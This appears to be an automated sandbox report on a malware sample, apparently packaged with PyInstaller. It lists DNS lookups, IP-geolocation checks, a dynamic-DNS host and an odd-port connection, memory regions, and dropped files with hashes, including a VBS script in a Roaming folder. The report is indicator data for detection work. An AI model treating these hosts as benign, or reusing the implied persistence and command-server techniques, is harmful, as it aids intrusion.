US 8.8.8.8:53 ifconfig.me udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 34.117.118.44:443 ifconfig.me tcp
US 8.8.8.8:53 44.118.117.34.in-addr.arpa udp
US 8.8.8.8:53 testhostnameserver.duckdns.org udp
BG 185.216.70.172:80 testhostnameserver.duckdns.org tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 172.70.216.185.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
NL 185.238.3.205:6669 tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 205.3.238.185.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp

Files

memory/2868-0-0x00007FF74BA00000-0x00007FF74C046000-memory.dmp

memory/2868-2-0x00007FF74BA00000-0x00007FF74C046000-memory.dmp

memory/2868-1-0x00007FF74BA00000-0x00007FF74C046000-memory.dmp

memory/2868-3-0x00007FF74BA00000-0x00007FF74C046000-memory.dmp

memory/4788-36-0x00007FF74BA00000-0x00007FF74C046000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI28682\python311.dll

MD5 a72993488cecd88b3e19487d646f88f6
SHA1 5d359f4121e0be04a483f9ad1d8203ffc958f9a0
SHA256 aa1e959dcff75a343b448a797d8a5a041eb03b27565a30f70fd081df7a285038
SHA512 c895176784b9ac89c9b996c02ec0d0a3f7cd6ebf653a277c20dec104da6a11db084c53dd47c7b6653a448d877ad8e5e79c27db4ea6365ebb8ca2a78aa9c61b38

memory/4788-37-0x00007FF74BA00000-0x00007FF74C046000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI28682\VCRUNTIME140.dll

MD5 870fea4e961e2fbd00110d3783e529be
SHA1 a948e65c6f73d7da4ffde4e8533c098a00cc7311
SHA256 76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644
SHA512 0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

C:\Users\Admin\AppData\Local\Temp\_MEI28682\base_library.zip

MD5 e9c28bc7ae0276a2413d913fabe101cc
SHA1 baefb0b00eac192113737106bc76b02244c17838
SHA256 7ecd1dfe0dcc82c2e595729cb238acb890326adc87136334ce9c21a5f0c847bf
SHA512 c25532849462e0dc1e3e7fd5f0dcc93a5dc18c7b29920819143ec30fec899f98cb8a538ab0084b9ba91f62705de3dededef6acfae02daf1efceabac3819804e9

C:\Users\Admin\AppData\Local\Temp\_MEI28682\python3.DLL

MD5 7feb3da304a2fead0bb07d06c6c6a151
SHA1 ee4122563d9309926ba32be201895d4905d686ce
SHA256 ddd2c77222e2c693ef73d142422d6bf37d6a37deead17e70741b0ac5c9fe095b
SHA512 325568bcf1835dd3f454a74012f5d7c6877496068ad0c2421bf65e0640910ae43b06e920f4d0024277eee1683f0ce27959843526d0070683da0c02f1eac0e7d2

C:\Users\Admin\AppData\Local\Temp\_MEI28682\libffi-8.dll

MD5 d86a9d75380fab7640bb950aeb05e50e
SHA1 1c61aaf9022cd1f09a959f7b2a65fb1372d187d7
SHA256 68fba9dd89bfad35f8fd657b9af22a8aebda31bffda35058a7f5ae376136e89b
SHA512 18437e64061221be411a1587f634b4b8efa60e661dbc35fd96a6d0e7eff812752de0ada755c01f286efefc47fb5f2daf07953b4cfc4119121b6bee7756c88d0f

C:\Users\Admin\AppData\Local\Temp\_MEI28682\select.pyd

MD5 116335ebc419dd5224dd9a4f2a765467
SHA1 482ef3d79bfd6b6b737f8d546cd9f1812bd1663d
SHA256 813eede996fc08e1c9a6d45aaa4cbae1e82e781d69885680a358b4d818cfc0d4
SHA512 41dc7facab0757ed1e286ae8e41122e09738733ad110c2918f5e2120dfb0dbff0daefcad2bffd1715b15b44c861b1dd7fb0d514983db50ddc758f47c1b9b3bf3

C:\Users\Admin\AppData\Local\Temp\_MEI28682\_uuid.pyd

MD5 13cc10d148b921f68e218dd912cc6ee4
SHA1 930cef88b581fb4d1b88fbdbaf64d34efa582f90
SHA256 d17e20063243a71b4331c7a8902451c6911fd87475ec918633c6388d6155ce52
SHA512 8af81d78a778875e63f99d7434724d772147da7ec07b88fb7094c9dcd02b86d08ce2bb3d3ee94d8c62156d2bf8331562b8c91b5e36a1278b64d0b6fd7eff45e6

C:\Users\Admin\AppData\Local\Temp\_MEI28682\_socket.pyd

MD5 0fc65ec300553d8070e6b44b9b23b8c0
SHA1 f8db6af578cf417cfcddb2ed798c571c1abd878f
SHA256 360744663fce8dec252abbda1168f470244fdb6da5740bb7ab3171e19106e63c
SHA512 cba375a815db973b4e8babda951d1a4ca90a976e9806e9a62520a0729937d25de8e600e79a7a638d77df7f47001d8f884e88ee4497bd1e05c1dae6fa67fb3dd8

C:\Users\Admin\AppData\Local\Temp\_MEI28682\_ctypes.pyd

MD5 df6be515e183a0e4dbe9cdda17836664
SHA1 a5e8796189631c1aaca6b1c40bc5a23eb20b85db
SHA256 af598ae52ddc6869f24d36a483b77988385a5bbbf4618b2e2630d89d10a107ee
SHA512 b3f23530de7386cc4dcf6ad39141240e56d36322e3d4041e40d69d80dd529d1f8ef5f65b55cdca9641e378603b5252acfe5d50f39f0c6032fd4c307f73ef9253

C:\Users\Admin\AppData\Local\Temp\_MEI28682\_ssl.pyd

MD5 93905020f4158c5119d16ee6792f8057
SHA1 eb613c31f26ed6d80681815193ffafdf30314a07
SHA256 d9cc4358d9351fed11eec03753a8fa8ed981a6c2246bbd7cb0b0a3472c09fdc4
SHA512 0de43b4fafdd39eaaff6cab613708d56b697c0c17505e4132d652fb3f878c2114f5e682745a41219193c75e783aede524685b77bd31620f8afe9c7b250f92609

C:\Users\Admin\AppData\Local\Temp\_MEI28682\libcrypto-1_1.dll

MD5 6f4b8eb45a965372156086201207c81f
SHA1 8278f9539463f0a45009287f0516098cb7a15406
SHA256 976ce72efd0a8aeeb6e21ad441aa9138434314ea07f777432205947cdb149541
SHA512 2c5c54842aba9c82fb9e7594ae9e264ac3cbdc2cc1cd22263e9d77479b93636799d0f28235ac79937070e40b04a097c3ea3b7e0cd4376a95ed8ca90245b7891f

C:\Users\Admin\AppData\Local\Temp\_MEI28682\_queue.pyd

MD5 045ef55136b1e580582199b3399267a2
SHA1 de54519c67a996d0a8b4164417058f4610a57376
SHA256 39bd456267fe228a505ef4e9c8d28f948dd65123cb4d48b77da51910013fa582
SHA512 7b764fdc92bf10eb05bdd4116a549de67f0fa92f807d8b0eca9d718361c546dbec16ea68ef8ddec1c417530c6eb234c657e45f8c522852ab1bd7cb21976dad1c

C:\Users\Admin\AppData\Local\Temp\_MEI28682\_lzma.pyd

MD5 3230404a7191c6228a8772d3610e49e5
SHA1 4e8e36c89b4ff440ddff9a5b084b262c9b2394ec
SHA256 33ae42f744d2688bb7d5519f32ff7b7489b96f4eea47f66d2009dba6a0023903
SHA512 6ecce0c8e8b3d42275d486e8ff495e81e36adaaacaaa3db37844e204fcdaa6d89cb3d81c43d9e16d938cd8b6671b8800fe74a1e723a9187b0566a8f3c39d5d5b

C:\Users\Admin\AppData\Local\Temp\_MEI28682\_bz2.pyd

MD5 10d42efac304861ad19821b4594fa959
SHA1 1a65f60bba991bc7e9322af1e19f193dae76d77a
SHA256 8eecdcc250637652e6babc306ea6b8820e9e835ddd2434816d0e0fd0ca67fd14
SHA512 3f16dba627a133586e9d1c16d383b9461424d31892278ab984f7e6932a1cdc51445e1bec017a665bd66c0f2a9ba417387fecc5fdede36d67f8343b82a2ceb9ae

C:\Users\Admin\AppData\Local\Temp\_MEI28682\unicodedata.pyd

MD5 cdb5f373d24adceb4dc4fa1677757f0c
SHA1 af6b381eed65d244c57129346008ec8532ba336b
SHA256 175c4cb528f1ac4e285c575cc3f5e85ec4b3ae88860210b5d795b580c7f0b5d9
SHA512 429a326648c761bf068ca7735094644f532d631cf9355c9f1a5743a5791837a36cd6aa2efe2265c7541feb06310d0c07b634dd04438d8eddbdf1c4147938a868

C:\Users\Admin\AppData\Local\Temp\_MEI28682\_hashlib.pyd

MD5 f419ac6e11b4138eea1fe8c86689076a
SHA1 886cda33fa3a4c232caa0fa048a08380971e8939
SHA256 441d32922122e59f75a728cc818f8e50613866a6c3dec627098e6cc6c53624e2
SHA512 6b5aa5f5fbc00fb48f49b441801ee3f3214bd07382444569f089efb02a93ce907f6f4e0df281bda81c80f2d6a247b0adc7c2384a2e484bc7ef43b43c84756d2b

C:\Users\Admin\AppData\Local\Temp\_MEI28682\libssl-1_1.dll

MD5 8769adafca3a6fc6ef26f01fd31afa84
SHA1 38baef74bdd2e941ccd321f91bfd49dacc6a3cb6
SHA256 2aebb73530d21a2273692a5a3d57235b770daf1c35f60c74e01754a5dac05071
SHA512 fac22f1a2ffbfb4789bdeed476c8daf42547d40efe3e11b41fadbc4445bb7ca77675a31b5337df55fdeb4d2739e0fb2cbcac2feabfd4cd48201f8ae50a9bd90b

memory/4788-39-0x00007FF74BA00000-0x00007FF74C046000-memory.dmp

memory/4788-38-0x00007FF74BA00000-0x00007FF74C046000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI28682\certifi\cacert.pem

MD5 59a15f9a93dcdaa5bfca246b84fa936a
SHA1 7f295ea74fc7ed0af0e92be08071fb0b76c8509e
SHA256 2c11c3ce08ffc40d390319c72bc10d4f908e9c634494d65ed2cbc550731fd524
SHA512 746157a0fcedc67120c2a194a759fa8d8e1f84837e740f379566f260e41aa96b8d4ea18e967e3d1aa1d65d5de30453446d8a8c37c636c08c6a3741387483a7d7

C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs

MD5 2ff38404d1ba59afb5227b767a10edb2
SHA1 d2ebdf09dd8a774ce26bc7188a8ef55599c1ea6f
SHA256 89661bf5e2229259732dccf803338d3aebc5d992c53d264321285784e7e39ca8
SHA512 707126f8f0834486acdecd78e62658a9c3951fd21c0433d3253984074aba981540682d5573a78ce3e3747d4f2edf5a6853501841538eda81e9bdc15f388c4832

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fbfgze5g.02x.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4868-87-0x0000017310FA0000-0x0000017310FC2000-memory.dmp

memory/2272-88-0x00000000053B0000-0x00000000053E6000-memory.dmp

memory/2272-89-0x0000000005B50000-0x0000000006178000-memory.dmp

memory/2272-92-0x0000000005AD0000-0x0000000005AF2000-memory.dmp

memory/2272-93-0x00000000062B0000-0x0000000006316000-memory.dmp

memory/2272-94-0x0000000006320000-0x0000000006386000-memory.dmp

memory/2272-104-0x0000000006390000-0x00000000066E4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5caad758326454b5788ec35315c4c304
SHA1 3aef8dba8042662a7fcf97e51047dc636b4d4724
SHA256 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA512 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

memory/4788-107-0x00007FF74BA00000-0x00007FF74C046000-memory.dmp

memory/2868-106-0x00007FF74BA00000-0x00007FF74C046000-memory.dmp

memory/2272-109-0x00000000069B0000-0x00000000069FC000-memory.dmp

memory/2272-108-0x0000000006970000-0x000000000698E000-memory.dmp

memory/2272-110-0x00000000082D0000-0x000000000894A000-memory.dmp

memory/2272-111-0x0000000006EB0000-0x0000000006ECA000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\oikjrjhe\oikjrjhe.cmdline

MD5 fbf74512086b3e8c7559c867423d6ed9
SHA1 acff1ce392d24b431349268ad224e8d1247be9b9
SHA256 bcd8b5e6d55e18dfcead15b84e2f6006c5564cfff529d19e5b7518ce0094d2b3
SHA512 d59eaef557526f3529c4fb7cd88ea6771e7e2ef78cd4b46dd644b3b1f13ec4fc2f9bb658f157061e662903ebcade2a53b26e7ef09353a77863c5e01080742cf0

\??\c:\Users\Admin\AppData\Local\Temp\oikjrjhe\oikjrjhe.0.cs

MD5 33d072d07a771b09fd1ba7d284a3e578
SHA1 9f38e71ce7633e16c3781cd57d084b1d040f6fd0
SHA256 3b637c3cafd1b8651d41dbf54a872316640609fe586eea711f8990eab29ef643
SHA512 61fcafd4448f254c6564f828d8feb19e7079d293050df34c4c215597c8d5cc5f9d52ea0eb39c643338a2ce8d82903be563f8faa598157689eaf9e3ac53b60bd4

C:\Users\Admin\AppData\Local\Temp\RESA9EC.tmp

MD5 83ef8828e60d655faff3aa1acf4f8f24
SHA1 0cb552c79236598af78da5406e205d264dffac32
SHA256 45425fada4df437c58fca9b37d891d3d4f6ec956ba6234606076270de230774c
SHA512 55b4082e67ebe2bb1222b8e8e94fc12893a065557957ec5a64506b220ad2b5dad55cc16af495e48441e2d48bf7b34fdc71a75e90bccdd9be8dbcba6d52c9ca4f

\??\c:\Users\Admin\AppData\Local\Temp\oikjrjhe\CSCC888C55530274DE68E10821A87175D4.TMP

MD5 7d2d64adf977af52c44a5aac9cb0ed60
SHA1 e008e244078b4f9b53c99cbe665dca4346054a4b
SHA256 20d6008536099658d1f4e91cd8f50eae56f46a68f3e1995db01564eb3e14a4fd
SHA512 9d8ed264f6f398fd892e5c4028a4beee423fcf4f3d0feb997db9e8b03a9896f45eaf81300018e9d0ece5bcb5488a7888954cb23c83f905e2ba06620878608e91

C:\Users\Admin\AppData\Local\Temp\oikjrjhe\oikjrjhe.dll

MD5 139bd01640d0b24bddae7f04d90f2537
SHA1 ed32b7a14a26af8f6a25e5a4409549f844a3a29d
SHA256 5a9bb119fadcdc48ed3e54df453577f69e9d4e5258e7ffa1a1a5b2a44de07c63
SHA512 00d47cfabad81b83382abb2def4e28d42cda859e3a4c8c7ac8310d940b01c05f59513a2d74d65d440e1241b5b0f0b40284c92d0dd00e5e2c2feacc8a8b77b2a1

memory/2272-124-0x0000000006F50000-0x0000000006F58000-memory.dmp

memory/4344-126-0x0000000000400000-0x000000000044E000-memory.dmp

memory/4344-127-0x00000000055E0000-0x0000000005B84000-memory.dmp

memory/4344-128-0x0000000005030000-0x00000000050C2000-memory.dmp

memory/4788-129-0x00007FF74BA00000-0x00007FF74C046000-memory.dmp

memory/2868-144-0x00007FF74BA00000-0x00007FF74C046000-memory.dmp

memory/4344-145-0x0000000005F10000-0x0000000005F22000-memory.dmp

memory/4344-146-0x0000000006350000-0x000000000638C000-memory.dmp

memory/4344-148-0x00000000066D0000-0x00000000066DA000-memory.dmp